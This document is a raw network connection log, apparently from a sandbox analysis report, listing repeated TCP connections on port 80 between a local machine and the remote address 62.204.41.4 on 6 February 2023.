                                                        Feb 6, 2023 14:16:36.092161894 CET4971580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:36.095011950 CET804971662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:36.095212936 CET4971680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:36.096630096 CET4971680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:36.165615082 CET804971662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:36.170519114 CET804971662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:36.170598984 CET4971680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:36.282521009 CET4971680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:36.344875097 CET804971662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:36.345038891 CET4971680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:38.043287039 CET4971780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:38.110043049 CET804971762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:57.920466900 CET4974680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:58.031753063 CET4974680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:58.032716036 CET4974780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:58.091959000 CET804974762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:58.092201948 CET4974780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:58.093214035 CET4974780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:58.093393087 CET804974662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:58.093502045 CET4974680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:58.156084061 CET804974762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:58.160079002 CET804974762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:58.160233974 CET4974780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:58.273191929 CET4974780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:58.274482012 CET4974880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:58.333806992 CET804974762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:58.334178925 CET4974780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:58.335123062 CET804974862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:58.335378885 CET4974880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:58.336551905 CET4974880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:58.400031090 CET804974862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:58.402678013 CET804974862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:58.402803898 CET4974880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:58.515983105 CET4974880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:58.516999960 CET4974980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:58.576625109 CET804974862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:58.576833010 CET4974880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:58.579652071 CET804974962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:58.579807997 CET4974980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:58.580579996 CET4974980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:58.643040895 CET804974962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:58.645394087 CET804974962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:58.645538092 CET4974980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:58.750211954 CET4974980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:58.751117945 CET4975080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:58.812520027 CET804975062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:58.812711954 CET4975080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:58.813121080 CET804974962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:58.813208103 CET4974980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:58.814620018 CET4975080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:58.875929117 CET804975062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:58.879216909 CET804975062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:58.879334927 CET4975080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:58.988476038 CET4975080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:58.989217043 CET4975180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:59.050399065 CET804975062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:59.050517082 CET4975080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:59.050985098 CET804975162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:59.051095009 CET4975180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:59.053793907 CET4975180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:59.114810944 CET804975162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:59.119268894 CET804975162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:59.119393110 CET4975180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:59.237354040 CET4975180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:59.246206999 CET4975280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:59.298631907 CET804975162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:59.298718929 CET4975180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:59.308548927 CET804975262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:59.308742046 CET4975280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:59.309365988 CET4975280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:59.370738983 CET804975262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:59.375677109 CET804975262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:59.375967979 CET4975280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:59.484575033 CET4975280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:59.485263109 CET4975380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:59.546855927 CET804975262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:59.547342062 CET4975280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:59.547956944 CET804975362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:59.548197031 CET4975380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:59.551732063 CET4975380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:59.616081953 CET804975362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:59.619138002 CET804975362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:59.619298935 CET4975380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:59.737266064 CET4975380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:59.737929106 CET4975480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:59.800012112 CET804975362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:59.800061941 CET804975462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:59.800117016 CET4975380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:59.800247908 CET4975480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:59.800601959 CET4975480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:59.862850904 CET804975462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:59.865664959 CET804975462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:59.865818024 CET4975480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:59.968765974 CET4975480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:59.969590902 CET4975580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:00.032002926 CET804975462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:00.032057047 CET804975562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:00.032186031 CET4975580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:00.032249928 CET4975480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:00.032530069 CET4975580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:00.096043110 CET804975562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:00.104228020 CET804975562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:00.105350018 CET4975580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:00.219949007 CET4975580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:00.228585005 CET4975680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:00.282857895 CET804975562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:00.286046982 CET4975580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:00.292314053 CET804975662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:00.296093941 CET4975680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:00.296701908 CET4975680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:00.358794928 CET804975662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:00.362060070 CET804975662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:00.362180948 CET4975680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:00.475377083 CET4975680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:00.476102114 CET4975780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:00.537169933 CET804975762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:00.537214041 CET804975662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:00.537416935 CET4975680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:00.537791014 CET4975780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:00.537791014 CET4975780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:00.597498894 CET804975762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:00.601149082 CET804975762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:00.604368925 CET4975780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:00.720138073 CET4975780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:00.721158981 CET4975880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:00.782983065 CET804975762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:00.784157038 CET4975780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:00.786325932 CET804975862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:00.786449909 CET4975880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:00.787103891 CET4975880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:00.849549055 CET804975862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:00.852035046 CET804975862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:00.852214098 CET4975880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:00.970238924 CET4975880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:00.971394062 CET4975980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:01.032197952 CET804975862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:01.032355070 CET4975880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:01.034832954 CET804975962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:01.035012007 CET4975980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:01.035712957 CET4975980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:01.098167896 CET804975962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:01.102294922 CET804975962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:01.104098082 CET4975980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:01.227199078 CET4975980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:01.228226900 CET4976080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:01.288784981 CET804976062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:01.289002895 CET804975962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:01.289235115 CET4975980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:01.289253950 CET4976080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:01.327723980 CET4976080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:01.388149023 CET804976062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:01.400182962 CET804976062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:01.400398970 CET4976080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:01.516415119 CET4976080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:01.517260075 CET4976180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:01.577002048 CET804976062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:01.577385902 CET4976080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:01.579174042 CET804976162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:01.579410076 CET4976180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:01.580132008 CET4976180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:01.644923925 CET804976162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:01.646137953 CET804976162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:01.646328926 CET4976180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:01.751084089 CET4976180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:01.752119064 CET4976280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:01.813443899 CET804976262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:01.813466072 CET804976162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:01.813683987 CET4976180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:01.814766884 CET4976280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:01.814766884 CET4976280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:01.883169889 CET804976262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:01.886197090 CET804976262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:01.886359930 CET4976280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:02.000653028 CET4976280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:02.001650095 CET4976380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:02.062210083 CET804976262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:02.062349081 CET804976362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:02.062355042 CET4976280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:02.062457085 CET4976380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:02.065956116 CET4976380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:02.088133097 CET804976162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:02.088282108 CET4976180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:02.138550043 CET804976362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:02.138685942 CET804976362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:02.138797998 CET4976380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:02.250628948 CET4976380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:02.251530886 CET4976480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:02.317265987 CET804976362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:02.317339897 CET4976380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:02.318675041 CET804976462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:02.318835974 CET4976480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:02.319284916 CET4976480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:02.381938934 CET804976462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:02.385740995 CET804976462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:02.385898113 CET4976480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:02.501190901 CET4976480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:02.501866102 CET4976580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:02.563199997 CET804976562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:02.563308954 CET4976580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:02.563683033 CET4976580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:02.564239979 CET804976462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:02.564336061 CET4976480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:02.625026941 CET804976562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:02.628305912 CET804976562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:02.628396034 CET4976580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:02.735565901 CET4976580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:02.736407995 CET4976680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:02.797504902 CET804976562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:02.797652006 CET4976580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:02.799484968 CET804976662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:02.799634933 CET4976680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:02.800103903 CET4976680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:02.862725973 CET804976662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:02.870012999 CET804976662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:02.870136976 CET4976680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:02.989965916 CET4976680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:02.990797043 CET4976780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:03.052397966 CET804976762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:03.052820921 CET4976780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:03.053143978 CET4976780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:03.053267002 CET804976662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:03.053365946 CET4976680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:03.114790916 CET804976762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:03.120043039 CET804976762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:03.120232105 CET4976780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:03.235744953 CET4976780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:03.237349987 CET4976880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:03.298047066 CET804976762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:03.298211098 CET4976780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:03.300010920 CET804976862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:03.300182104 CET4976880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:03.301034927 CET4976880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:03.363495111 CET804976862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:03.366358995 CET804976862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:03.366547108 CET4976880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:03.469860077 CET4976880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:03.470758915 CET4976980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:03.537036896 CET804976962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:03.537338018 CET804976862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:03.537492037 CET4976880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:03.540216923 CET4976980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:03.541604042 CET4976980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:03.601032972 CET804976962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:03.604628086 CET804976962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:03.604799986 CET4976980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:17.481492043 CET804979962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:17.482595921 CET4979980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:17.592940092 CET4979980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:17.593777895 CET4980080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:17.654216051 CET804979962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:17.654253006 CET804980062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:17.654423952 CET4979980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:17.654455900 CET4980080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:17.654881954 CET4980080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:17.715394020 CET804980062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:17.718599081 CET804980062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:17.718755007 CET4980080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:17.833981037 CET4980080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:17.835361004 CET4980180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:17.894861937 CET804980062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:17.895903111 CET804980162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:17.901659012 CET4980080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:17.901683092 CET4980180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:17.902349949 CET4980180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:17.963226080 CET804980162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:17.965825081 CET804980162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:17.966022968 CET4980180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:18.075246096 CET4980180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:18.076359987 CET4980280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:18.136271000 CET804980162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:18.137939930 CET804980262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:18.143631935 CET4980180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:18.143713951 CET4980280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:18.144256115 CET4980280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:18.205761909 CET804980262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:18.215267897 CET804980262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:18.215516090 CET4980280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:18.333969116 CET4980280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:18.334983110 CET4980380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:18.395593882 CET804980262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:18.395658016 CET804980362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:18.395817041 CET4980280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:18.395865917 CET4980380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:18.396344900 CET4980380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:18.456655025 CET804980362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:18.459352970 CET804980362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:18.468831062 CET4980380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:18.573024035 CET4980380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:18.573918104 CET4980480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:18.633579016 CET804980362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:18.634407997 CET804980462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:18.638003111 CET4980380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:18.638019085 CET4980480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:18.644414902 CET4980480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:18.705710888 CET804980462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:18.708070993 CET804980462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:18.708230972 CET4980480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:18.814786911 CET4980480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:18.815532923 CET4980580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:18.874985933 CET804980562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:18.875169039 CET804980462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:18.877907991 CET4980480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:18.878112078 CET4980580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:18.884453058 CET4980580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:18.944061995 CET804980562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:18.946724892 CET804980562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:18.946914911 CET4980580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:19.054881096 CET4980580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:19.055795908 CET4980680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:19.114453077 CET804980562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:19.114636898 CET4980580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:19.118371010 CET804980662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:19.119038105 CET4980680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:19.119476080 CET4980680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:19.181876898 CET804980662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:19.188005924 CET804980662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:19.192627907 CET4980680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:19.326853991 CET4980680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:19.327749968 CET4980780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:19.390597105 CET804980662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:19.390913010 CET804980762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:19.392291069 CET4980680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:19.392334938 CET4980780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:19.395600080 CET4980780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:19.458412886 CET804980762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:19.461359978 CET804980762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:19.461500883 CET4980780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:19.565996885 CET4980780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:19.567210913 CET4980880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:19.627763033 CET804980862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:19.628592968 CET804980762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:19.636032104 CET4980780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:19.636090994 CET4980880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:19.636620998 CET4980880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:19.697011948 CET804980862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:19.700081110 CET804980862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:19.700371027 CET4980880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:19.816787004 CET4980880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:19.817754984 CET4980980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:19.877335072 CET804980862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:19.877527952 CET4980880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:19.878233910 CET804980962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:19.878371000 CET4980980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:19.879292965 CET4980980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:19.940009117 CET804980962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:19.942990065 CET804980962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:17:19.951071978 CET4980980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:17:20.063674927 CET4980980192.168.2.562.204.41.4
